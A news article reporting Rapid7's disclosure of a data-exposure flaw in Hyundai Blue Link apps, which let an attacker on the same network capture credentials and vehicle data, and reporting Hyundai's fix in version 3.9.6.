Hyundai Blue Link app vulnerable; login credentials and GPS data at risk

Hyundai Blue Link apps on Android and Apple app stores are vulnerable to cyber attacks which if exploited can allow attackers to steal personal as well as sensitive data of the user. The vulnerability exists in the apps’ software 3.9.4 and 3.9.5 which takes advantage of insecure WiFi spots or by the standard man-in-the-middle (MitM) attack to trick users into connecting to a WiFi network controlled by the attackers before stealing user data.

The vulnerability was discovered by Will Hatzer and Arjun Kumar of Rapid7 who wrote in a blog post that “The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by the standard man-in-the-middle (MitM) attack methods to trick a user into connecting to a WiFi network controlled by an attacker on the same network as the user. If this is achieved, an attacker would then watch for HTTP traffic directed at http://54.64.135.113:8080/LogManager/LogServlet, which includes the encrypted log file with a filename that includes the user’s email address.”

The data which can be stolen using this method is vehicle’s registration, PINs via a log transmission feature, app’s username, and password. But, since with the help of Hyundai Blue Link apps, users can remotely start their vehicle, remotely unlock or lock the door, remotely activate the horn and lights, access saved POI history and find their car, etc; this information could be used to locate, unlock and start the Hyundai remotely. However, the researchers noted that “It would be difficult to conduct this attack at scale since an attacker would typically need first to subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor’s service instance.”

Hyundai Motor America (HMA) was informed about the issue who acknowledged that a vulnerability affected its users. The good news is that Hyundai was quick to fix the problem by releasing updates (Version 3.9.6) on both Google Play and the Apple App Store.

Update your Hyundai Blue Link app

According to an official statement from Hyundai, “The privacy and security of our customers are of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.”

The Hyundai Blue Link application was launched in December 2016 to give the user instant access to their vehicle but since Internet of Things (IoT) devices are vulnerable from the get-go it shouldn’t  surprise users that Hyundai’s apps were also vulnerable. 

Previously, security researchers discovered similar vulnerabilities in other apps dealing with the vehicles. For instance, one researcher hacked into the General Motors (GM) mobile app and demonstrated how one could locate, unlock and steal the targeted car. Recently, just a couple of weeks ago researchers exposed critical vulnerabilities in WIFI dongle leading them to hack into a car’s data transmitter with the help of Bluetooth.